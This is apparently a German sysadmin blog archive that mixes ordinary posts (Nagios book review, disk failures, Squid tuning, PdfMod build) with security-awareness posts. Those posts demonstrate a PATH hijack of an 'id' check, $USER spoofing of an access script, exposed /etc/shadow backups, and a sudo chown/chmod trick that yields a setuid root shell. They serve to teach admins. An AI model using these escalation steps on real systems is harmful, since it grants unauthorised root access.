Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf ADMinLIFE. Also los: Reader umstellen!

Nach einigem git bisect’en ergab sich vorhin:

Bisecting: 0 revisions left to test after this (roughly 0 steps)

[1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000

Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer liest schon dauernd die LKML oder guckt sich alle Changes vor einem Kernel-Update an?

Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.

Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch – wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen – für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.

Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.

Edit: Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!


[user@srv2342 ~]$ ls -l /opt/backup
-rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz
-rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz
-rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz
-rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz


Natürlich war auch die /etc/shadow enthalten… john macht damit bekanntlich meist kurzen Prozess.

Beliebt sind scheinbar auch Scripte, die etwas der folgenden Art machen, um Backups zu erstellen und die Rechte korrekt zu setzen:

tar -czf /opt/backup/etc-backup.tgz /etc
chmod 600 /opt/backup/etc-backup.tgz

Hier entsteht eine klassische Race-Condition. Falls der Angreifer die Platten verlangsamt (z.B. per dd) und/oder eine while true Schleife nutzt, die er kurz vor Backupbeginn startet, kann er evtl. Teile oder das gesamte Backup kopieren.

Besser: Global umask 0027 setzen. Falls nicht möglich (z.B. Firmen-Policy), einfach vor dem Aufruf von tar ausführen:

umask 0027
tar -czf /opt/backup/etc-backup.tgz /etc


Backups müssen genauso wie die Originaldaten behandelt werden und gehören nicht nach /tmp oder mit unsicheren Dateirechten sonstwohin.

Tim schlug hier vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem?


#!/bin/bash
if [ "$(id -u)" != "1001" ] && [ "$(id -u)" != "1002" ]
then
echo "Zugriff verweigert."
else
echo OK
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi


Umgehen kann man es jedoch wieder trivial, man erstelle ~/id:

[stefan@srv2342 ~]$ sh authme.sh
Zugriff verweigert.
[stefan@srv2342 ~]$ echo "echo 1001" > ~/id
[stefan@srv2342 ~]$ chmod +x ~/id
[stefan@srv2342 ~]$ PATH=".:$PATH" sh authme.sh
OK
[stefan@srv2342 ~]$


Wir haben hier PATH so geändert, dass zuerst im aktuellen Pfad nach id Datei gesucht wird – die Datei haben wir grade angelegt und sie gibt aus, was das Script als Antwort sehen möchte. Whoops! ;D

Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat!

Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:




#!/bin/bash
if [ "$USER" != "franz" ] && [ "$USER" != "karl" ]
then
echo "Zugriff verweigert."
else
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi


Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:

USER=franz ./domain-delete.sh [domain]


Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.

Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.

Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.

user@srv2342: ~> id
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)



Ich brauche zuerst ein kleines C-Tool:

user@srv2342: ~> cat > /foo/y.c
#include
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
STRG-D


Compilieren:

user@srv2342:/foo> cd /foo; gcc y.c -o y


Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:

user@srv2342:/foo> sudo /bin/chown 0:0 /foo/y
user@srv2342:/foo> sudo /bin/chmod 4775 /foo/y
user@srv2342:/foo ls -l
total 16
-rwsrwxr-x 1 root root 9217 Mar 26 14:52 y
-rw-r----- 1 user users 101 Mar 26 14:51 y.c


Root werden:

user@srv2342:/foo> ./y
srv2342:/foo # id
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)

Owned!

Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.

/etc/rc.conf:

ifconfig_em0="inet 192.168.0.220 192.168.0.210"
static_routes="default"
route_default="-net 0.0.0.0 -iface -interface em0"

Ist auf der anderen Seite Linux im Einsatz, so macht man dort:

ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX

Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script).

Vor einiger Zeit kam das im Juni erschienene Praxisbuch Nagios bei mir an – Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen…

Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren Admin als Nachschlagewerk oder Inspiration brauchbar, denn es wird auch auf fortgeschrittenere Themen wie z.B. Visualisierung und Pluginprogrammierung eingegangen.

Ausführlich erläutert das Buch anfangs, was mit Nagios möglich ist, was es mit Scheduling, Plugins, Benachrichtigungen, CGIs fürs Webinterface, Zeitperioden, Check-Kommandos, Templates usw. auf sich hat – jeweils ausführlich anhand von Beispielen. Dank der mitgelieferten Live-CD kann man bei Interesse auch zu haus sehr schnell selbst loslegen, ohne ein gesamtes Nagios installieren und konfigurieren zu müssen.Im 2. Teil des Buches wird anhand eines beispielhaften Unternehmens ausführlich beschrieben, wie eine initiale Nagios-Installation einzurichten ist – der gesamte Prozess von der Ist-Aufnahme bis zu Alarmierungsmöglichckeiten im Fehlerfalle. So lernt man z.B. welche Checks wofür Sinn machen, wie sinnvoll mit Templates gearbeitet werden kann und wie genau das Ganze dann in der Praxis umgesetzt wird. In späteren Kapiteln werden auch NRPE (Nagios Remote Plugin Executor), NSCP (NagiosClient++ für Windows) und check_by_ssh erläutert, die wichtig sind, um beispielsweise auf entfernten Servern Festplattenkapazitäten zu überprüfen, weiterhin wird auch auf passive Überwachung per NSCA (Nagios Service Check Acceptor) eingegangen – dadurch kann z.B. eine Firewall von sich aus Meldungen per SNMP Trap an Nagios übermitteln, sodass kein ständiges Polling stattfinden muss. Wie immer, wird alles – auch das ggfs. notwendige Compilieren – ausführlich beschrieben, sodass man nicht Anweisungen wie “Installieren Sie nun snmptt.” allein gelassen wird.

Im 3. Teil wird letztendlich auf graphische Auswertungsmethoden eingegangen, um die man als Administrator über kurz oder lang nicht herumkommt – vor allem, wenn ITIL vor der Tür steht. Hier wird im Detail auf PNP und NagVis eingegangen, auch einige Tuning-Hinweise fehlen nicht.

Zuletzt gibt es noch ein meiner Ansicht nach sehr sinnvolles Kapitel über Plugin-Programmierung incl. Quellcodes – irgendwann kommt man nämlich an die Stelle, an der man für einen bestimmten Service oder eine bestimmte Anwendung – etwa für ein proprietäres Tool zur Raidcontrollerüberprüfung – kein passendes Plugin findet. Eine Übersicht der Konfigurationsoptionen der Nagios-Dateien mit jeweiliger Erläuterung findet sich im Anhang – als Nachschlagewerk praktisch.

Als Admin, der bereits Berührungspunkte mit Nagios hatte, wird man einige Teile zwar überblättern, spätestens aber bei der Pluginprogrammierung und Visualisierung innehalten – auch die über das gesamte Buch hinweg eingestreuten nützlichen “kleine Tipps” wie z.B. den Hinweis auf NagiosChecker für Firefox (den ich selbst seit längerer Zeit benutze) erweitern das Wissen über das Nagios-Universium.

Meine einzige Kritik ist, dass im Kapitel zu NRPE unerwähnt bleibt, dass solche Checks auch z.B. über ein bereits installiertes net-snmp per exec ausgeführt werden könnten – dies ist jedoch zugegebenermaßen weitaus weniger flexibel und erfordert ggfs. eine Softwaredeploymentlösung, möchte man auf einem konsistenten Stand bleiben.

Ich kann das Buch für Einsteiger und weniger erfahrene Nagios-Admins nur ausdrücklich empfehlen, selbst als erfahrener Nagios-Hase kann man aber evtl. noch ein paar interessante Sachen erfahren; der weit fortgeschrittene Admin mit >2000 Checks in seinem Nagios wird sich zwar einen Großteil des Buches bereits selbst erarbeitet haben, könnte aber ggfs. trotzdem noch z.B. beim Templating, der Pluginprogrammierung oder Visualisierung etwas dazulernen.

[code language="shell"]
#/bin/sh
# Show all the colors of the rainbow, should be run under bash
for STYLE in 0 1 2 3 4 5 6 7; do
for FG in 30 31 32 33 34 35 36 37; do
for BG in 40 41 42 43 44 45 46 47; do
CTRL="\033[${STYLE};${FG};${BG}m"
echo -en "${CTRL}"
echo -n "${STYLE};${FG};${BG}"
echo -en "\033[0m"
done
echo
done
echo
done
# Reset
echo -e "\033[0m"
[/code]

Nutzen lässt sich z.B: die Farbe grün (Code 32) mit fetter Schrift (Code 1) wie folgt:

[code language="shell"]
echo -e "\e[1;32mGREEN\033[0m"
[/code]

Anschließend wird die Terminalfarbe mit der Code Kombination \033[0m wieder auf die Standardfarben resettet.

via

Live CDs sind tod – es lebe der Live USB-Stick! Dank UNetbootin wird die Erstellung eines solchen bootfähigen USB-Sticks zum Kinderspiel. Alle bekannten Linux Distributionen, verschiedene BSD Derivate sowie spezielle Live CDs (z.B. Antivir- und Systemrettungsdisks) können mittels UNetbootin mit wenigen Klicks auf einen USB Stick gebracht werden.

Nach der Auswahl der gewünschten Distribution und des zu nutzenden USB-Sticks lädt UNetbootin alle benötigten Dateien automatisch herunter und erstellt den bootfähigen USB-Stick. Auch eigene ISO-Dateien – z.B. von anderen Linux Distributionen – kann man auswählen und auf den Stick speichern. Möglich ist auch die Auswahl eines benutzerdefinierten Kernels.

UNetbootin ist bei den meisten Linux Distributionen bereits als Paket vorhanden. Auch für Windows ist das Programm verfügbar.

Weitere Informationen zu Linux auf dem USB-Stick:
Pendrivelinux.com
Live USB Stick mit Ubuntu Boardmitteln

Das Video ist schon ein paar Tage älter und vergleicht eine Ubuntu Karmic Alpha Version sowie den Release Candidate von Windows 7. Kein echter Benchmark, aber ein interessanter Vergleich.

Der Hinweis wäre auch an so mancher Workstation sicherlich nicht fehl am Platze.

Nachrichten lesen am heimischen Computer – damals noch keine große Konkurrenz für die Zeitungsverlage…

Noch Fragen?

PacketLife.net hat einige nützliche Spickzettel rund ums Thema Netzwerk im Angebot. Neben IPv4 und IPv6 geht es u.a. um BGP, PPP, IPSec und WLAN. Zusätzlich gibt es eine Zusammenfassung über die wichtigsten Parameter zu tcpdump und Wireshark sowie eine Übersicht von Kabeltypen. Alle Cheatsheets sind kostenlos im PDF Format verfügbar.

Network Cheatsheets @packetlife.net

Heute ist der letzte Tag um World Of Goo für theoretisch 1 Cent statt 20 USD zu erwerben. 2D Boy – die Macher hinter diesem recht erfolgreichen Spiel – lassen euch den Preis bestimmen. Das Spiel gibt es neben Mac- und Windows- auch in einer Linuxversion. Sogar ein Debian Paket, z.B. für Ubuntu, ist vorhanden! Ich kann das Spiel nur weiterempfehlen.

Klick aufs Bild für Vollansicht. Laut Anbieter “sehr intuitiv bedienbar”.

via

Keine Sorge – Linus hat kein Windows 7 gekauft. Das Foto entstand auf einer Linux Veranstaltung in Japan, bei der Microsoft direkt neben dieser Veranstaltung eine Windows 7 Promotion gestartet hat.

via

Ich hoffe das neue Design trifft auf Zustimmung. Auf euer positives oder negatives Feedback bin ich gespannt – ebenso helfen mir von euch gefundene Fehler weiter. Also: Her damit!

Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt!

Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte – es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa von ^http://domain/formular auf https://domain/formular.

Das ursprüngliche Script war in BASH programmiert – es verwendete externe Programme wie grep, sed – und war für geringe Bandbreiten (5MBit/s) performant genug. Die Bandbreite stieg jedoch bald auf 20MBit/s, was die Last schon sehr deutlich erhöhte, und es werden voraussichtlich bald ~200MBit/s sein.

Das Script wurde daraufhin in Perl reimplementiert und läuft laut Benchmark um den Faktor 180 (!) schneller. Als Benchmark empfiehlt sich:

[code language="shell"]time tail /var/log/squid/access_combined.log -n 100000 | awk '{print $7}' | /pfad/zum/url_rewriter.pl > /dev/null[/code]

Wenn dort (z.B. bei einem komplizierterem Script) Werte von mehr als 5 Sekunden stehen, sollte man sein Script für hohe Bandbreiten ggfs. überarbeiten und/oder in einer performanteren Sprache reimplementieren, z.B. in C oder für Extremfälle in Assembler.

• Programmieren einer Schnittstelle, die die Regeln ausliest und in ein Repo eincheckt
• Automatische Backups durch die Firewall erzeugen lassen (oftmals per Mail möglich) und einchecken in ein Repo
• Eingeben der Firewallregeln in ein Dokumentationssystem
• Eingeben der Firewallregeln in ein System, welches die Regeln dann auf der Firewall anlegt
• Keine Dokumentation

Mich würde interessieren, wie ihr hier vorgeht? Z.B. für eine Zertifizierung nach dem IT-Grundschutzhandbuch sind solche organisatorischen Dinge nicht ganz unwichtig.

Bei PdfMod handelt es sich um eine einfache Applikation zum Bearbeiten von PDF Dateien. Mit der Gnome Applikation können beispielsweise einzelne PDF Seiten exportiert, entfernt oder rotiert werden. Weitere Funktionen finden sich auf der offiziellen Homepage.

Da es derzeit kein offizielles Ubuntu Paket für Ubuntu Jaunty gibt, müssen wir PdfMod aus den Quellen kompilieren. Zuerst benötigen wir einige Abhängigkeiten und bereiten das System vor:

[code language="css"]
sudo aptitude install build-essential intltool mono-gmcs
sudo ln -s /usr/bin/gmcs2 /usr/bin/gmcs
[/code]

PdfMod hat als Abhängigkeit die C# Library Hyena, die wie folgt heruntergeladen und nach /usr/local installiert werden kann:

[code language="css"]
wget http://ftp.gnome.org/pub/GNOME/sources/hyena/0.1/hyena-0.1.tar.gz
tar xzvf hyena-0.1.tar.gz
cd hyena-0.1/
./configure --prefix=/usr/local
make && sudo make install
[/code]

PdfMod wird ebenfalls heruntergeladen und konfiguriert:

[code language="css"]
wget http://ftp.gnome.org/pub/GNOME/sources/pdfmod/0.6/pdfmod-0.6.tar.gz
tar xzvf pdfmod-0.6.tar.gz
cd pdfmod-0.6/
./configure --prefix=/usr/local
[/code]

Leider gibt es bei der aktuellen Version noch einen Bug, der folgenden Fehler beim make Aufruf erzeugt:

[code language="css"]
cp: cannot stat `@expanded_libdir@/hyena/Hyena.dll': No such file or directory
cp: cannot stat `@expanded_libdir@/hyena/Hyena.Gui.dll': No such file or directory
[/code]

Hierbei hilf folgender sed Aufruf, der die fehlerhaften Zeilen ersetzt:

[code language="css"]
sed -i 's/@expanded_libdir@/${expanded_libdir}/g' config.status
[/code]

Danach wird PdfMod wie folgt kompiliert und installiert:

[code language="css"]
make && sudo make install
[/code]

Nun ist PdfMod installiert und kann mittels pdfmod aufgerufen werden. Ubuntu 9.10/Karmic Benutzer können sich die Kompilierorgie übrigens sparen – es gibt fertige Pakete im PPA.